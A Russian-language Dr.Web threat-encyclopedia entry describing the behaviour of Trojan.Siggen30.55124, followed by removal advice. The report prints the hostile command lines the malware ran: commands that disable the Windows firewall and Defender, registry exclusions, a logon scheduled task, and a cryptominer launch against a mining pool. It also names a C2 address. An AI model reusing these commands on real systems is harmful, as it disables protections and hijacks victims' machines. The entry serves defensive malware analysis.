Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen30.55124

Добавлен в вирусную базу Dr.Web: 2025-01-29

Описание добавлено:

Техническая информация

Вредоносные функции
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра
  • [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
  • [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
  • Системный антивирус (Защитник Windows)
Запускает на исполнение
  • '%WINDIR%\syswow64\netsh.exe' Advfirewall set allprofiles state off
  • '%WINDIR%\syswow64\net.exe' stop windefend
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\aut8b9c.tmp
  • %ALLUSERSPROFILE%\defender\windows protection.exe
  • %TEMP%\aut6f57.tmp
  • %ALLUSERSPROFILE%\defender\winring0x64.sys
  • %TEMP%\aut6f68.tmp
  • %ALLUSERSPROFILE%\defender\start.exe
  • %TEMP%\aut6f88.tmp
  • %ALLUSERSPROFILE%\defender\start.vbs
  • %TEMP%\aut6fc7.tmp
  • %ALLUSERSPROFILE%\defender\k.bat
  • %TEMP%\aut6fd8.tmp
  • %ALLUSERSPROFILE%\defender\k.vbs
  • %ALLUSERSPROFILE%\defender\d.exe
  • %TEMP%\aut6fe9.tmp
  • %TEMP%\aut6ff9.tmp
  • %ALLUSERSPROFILE%\defender\s.vbs
  • %TEMP%\aut7048.tmp
  • %ALLUSERSPROFILE%\defender\s.bat
  • %TEMP%\aut7059.tmp
  • %ALLUSERSPROFILE%\defender\timeout.ps1
  • %TEMP%\aut7098.tmp
  • %ALLUSERSPROFILE%\defender\windows process.exe
  • %TEMP%\ad8d.tmp\ad8e.tmp\b01e.bat
  • %WINDIR%\syswow64\grouppolicy\gpt.ini
  • <SYSTEM32>\grouppolicy\machine\registry.pol
  • %ALLUSERSPROFILE%\task host\svchost.exe
  • %TEMP%\aut6d82.tmp
  • %TEMP%\aut6ce5.tmp
  • %ALLUSERSPROFILE%\defender\c1.exe
  • %ALLUSERSPROFILE%\defender\ac.exe
  • %TEMP%\aut8bdb.tmp
  • %ALLUSERSPROFILE%\defender\ab.exe
  • %ALLUSERSPROFILE%\defender\dc.ini
  • %ALLUSERSPROFILE%\defender\dd.bat
  • %ALLUSERSPROFILE%\defender\ddd.bat
  • %ALLUSERSPROFILE%\defender\dc.exe
  • %ALLUSERSPROFILE%\defender\dd.vbs
  • %TEMP%\auta075.tmp
  • %ALLUSERSPROFILE%\defender\ac1.exe
  • %ALLUSERSPROFILE%\defender\a.exe
  • %ALLUSERSPROFILE%\defender\crdllunload32.dll
  • <SYSTEM32>\grouppolicy\gpt.ini
  • %ALLUSERSPROFILE%\defender\p.vbs
  • %ALLUSERSPROFILE%\defender\crdllunload64.dll
  • %ALLUSERSPROFILE%\defender\d1.exe
  • %ALLUSERSPROFILE%\defender\l.exe
  • %ALLUSERSPROFILE%\defender\l.ini
  • %ALLUSERSPROFILE%\defender\t.bat
  • %ALLUSERSPROFILE%\defender\t.vbs
  • %ALLUSERSPROFILE%\defender\u.exe
  • %ALLUSERSPROFILE%\defender\usrfindhandle32.sys
  • %ALLUSERSPROFILE%\defender\usrfindhandle64.sys
  • %ALLUSERSPROFILE%\defender\v.bat
  • %ALLUSERSPROFILE%\defender\w.bat
  • %TEMP%\autd2bc.tmp
  • %ALLUSERSPROFILE%\defender\config.json
  • %ALLUSERSPROFILE%\defender\d.vbs
  • <SYSTEM32>\grouppolicy\user\registry.pol
Удаляет следующие файлы
  • %TEMP%\aut8b9c.tmp
  • %TEMP%\aut7059.tmp
  • %TEMP%\aut7048.tmp
  • %TEMP%\aut6ff9.tmp
  • %TEMP%\aut6fe9.tmp
  • %TEMP%\aut6fd8.tmp
  • %TEMP%\aut6fc7.tmp
  • %TEMP%\aut7098.tmp
  • %TEMP%\aut6f88.tmp
  • %TEMP%\aut6f57.tmp
  • %TEMP%\aut6d82.tmp
  • %TEMP%\aut6ce5.tmp
  • %TEMP%\autd2bc.tmp
  • %TEMP%\auta075.tmp
  • %TEMP%\aut8bdb.tmp
  • %TEMP%\aut6f68.tmp
  • %TEMP%\ad8d.tmp\ad8e.tmp\b01e.bat
Сетевая активность
Подключается к
  • '17#.#11.238.165':5500
Другое
Ищет следующие окна
  • ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
  • '%ALLUSERSPROFILE%\defender\ab.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
  • '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\dd.vbs"
  • '%ALLUSERSPROFILE%\defender\ac1.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
  • '%ALLUSERSPROFILE%\defender\u.exe'
  • '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\d.vbs"
  • '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe
  • '%ALLUSERSPROFILE%\defender\ac.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
  • '%ALLUSERSPROFILE%\defender\c1.exe'
  • '%ALLUSERSPROFILE%\defender\start.exe'
  • '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\s.vbs"
  • '%ALLUSERSPROFILE%\task host\svchost.exe'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy Unrestricted %ALLUSERSPROFILE%\Defender\timeout.ps1
  • '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\p.vbs"
  • '%ALLUSERSPROFILE%\defender\windows protection.exe'
  • '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k
Запускает на исполнение
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1BBB.tmp" "%TEMP%\CSC1BAA.tmp" (со скрытым окном)
  • '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Task Host" /t REG_DWORD /d 0 /f
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Defender" /t REG_DWORD /d 0 /f
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
  • '%WINDIR%\syswow64\net1.exe' stop windefend
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN "Windows Protection" /TR "%ALLUSERSPROFILE%\Defender\Start.exe" /f
  • '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" " (со скрытым окном)
  • '<SYSTEM32>\timeout.exe' /t 10
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\AD8D.tmp\AD8E.tmp\B01E.bat %ALLUSERSPROFILE%\Defender\Start.exe" (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" " (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pw5upzj4.cmdline" (со скрытым окном)
  • '<SYSTEM32>\svchost.exe' -k secsvcs
  • '%ALLUSERSPROFILE%\defender\windows protection.exe'  (со скрытым окном)
  • '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k (со скрытым окном)
  • '%ALLUSERSPROFILE%\task host\svchost.exe'  (со скрытым окном)
  • '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe (со скрытым окном)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке